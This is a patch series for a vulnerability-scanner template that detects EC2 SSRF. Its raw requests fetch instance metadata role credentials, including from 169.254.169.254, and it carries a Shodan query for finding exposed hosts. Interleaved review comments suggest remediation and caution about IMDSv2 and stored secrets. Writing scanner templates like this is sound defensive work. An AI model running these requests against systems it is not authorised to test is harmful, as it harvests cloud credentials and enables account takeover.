From 6b45d0be7a8894b55d63b539eb07e20a1395e829 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Sun, 18 Dec 2022 19:53:30 +0530
Subject: [PATCH 1/4] Create amazon-ec2-ssrf.yaml
---
 vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 28 +++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 vulnerabilities/amazon/amazon-ec2-ssrf.yaml
diff --git a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml
new file mode 100644
index 0000000000..159802e3de
--- /dev/null
+++ b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml
@@ -0,0 +1,28 @@
+id: amazon-ec2-ssrf
+info:
+ name: Amazon EC2 SSRF
+ author: DhiyaneshDk
+ severity: critical
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
+ cvss-score: 9.3
+ cwe-id: CWE-441
+ metadata:
+ verified: "true"
+ shodan-query: "Server: EC2ws"
+ tags: aws,ec2,ssrf,amazon
+
+requests:
+ - raw:
+ - |+
+ GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1
+ Host: {{Hostname}}
+
+ unsafe: true
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "AccessKeyId"
+ - "SecretAccessKey"
+ condition: and
From dece342c2109b39db19f2e513cc1a12d11e6b1c8 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Sun, 18 Dec 2022 22:23:05 +0530
Subject: [PATCH 2/4] Update amazon-ec2-ssrf.yaml
---
 vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)
diff --git a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml
index 159802e3de..3c769f6ce8 100644
--- a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml
+++ b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml
@@ -1,4 +1,5 @@
 id: amazon-ec2-ssrf
+
 info:
 name: Amazon EC2 SSRF
 author: DhiyaneshDk
@@ -8,7 +9,6 @@ info:
 cvss-score: 9.3
 cwe-id: CWE-441
 metadata:
- verified: "true"
 shodan-query: "Server: EC2ws"
 tags: aws,ec2,ssrf,amazon
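Review bot: The `info` block of the new template in PATCH 1/4 has no `description` or `remediation`, so a critical finding reaches the operator without saying what was exposed or what to change. I would add `description: The host relays requests to the EC2 instance metadata service and returns the instance role's temporary credentials.` and `remediation: Require IMDSv2 (HttpTokens=required) on the instance, stop the proxy or application from forwarding to 169.254.169.254, and treat any returned role credentials as compromised.` The classification uses `cwe-id: CWE-441`; if the template is meant as SSRF, as its name says, CWE-918 is the more specific entry.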
@@ -18,7 +18,13 @@ requests:
 GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1
 Host: {{Hostname}}
+ - |+
+ GET http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1
+ Host: {{Hostname}}
+
+ stop-at-first-match: true
 unsafe: true
+ matchers-condition: and
 matchers:
 - type: word
 part: body
@@ -26,3 +32,7 @@ requests:
 - "AccessKeyId"
 - "SecretAccessKey"
 condition: and
+
+ - type: status
+ status:
+ - 200
From cacf0ef565bad8c4dcf33f7534872874b52db682 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 22 Dec 2022 11:03:37 +0530
Subject: [PATCH 3/4] Update amazon-ec2-ssrf.yaml
---
 vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml
index 3c769f6ce8..43f0522be6 100644
--- a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml
+++ b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml
@@ -1,7 +1,7 @@
 id: amazon-ec2-ssrf
 info:
- name: Amazon EC2 SSRF
+ name: Amazon EC2 - Server-side request forgery (SSRF)
 author: DhiyaneshDk
 severity: critical
 classification:
@@ -9,6 +9,7 @@ info:
 cvss-score: 9.3
 cwe-id: CWE-441
 metadata:
+ verified: true
 shodan-query: "Server: EC2ws"
 tags: aws,ec2,ssrf,amazon
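Review bot: Both raw requests in the `@@ -18,7 +18,13 @@` hunk of PATCH 2/4, including the one added for `http://169.254.169.254`, are plain IMDSv1-style GETs, so an instance that enforces IMDSv2 returns no credentials and the template stays silent even if the host still forwards requests to link-local addresses. That limit is worth stating where the requests are defined, for example `# Covers IMDSv1 only: no match does not show that forwarding to 169.254.169.254 is blocked.` above `- raw:`. A match also means the response body held live role credentials, so stored responses from this template should be handled as secrets. The `requests` block starts outside this hunk.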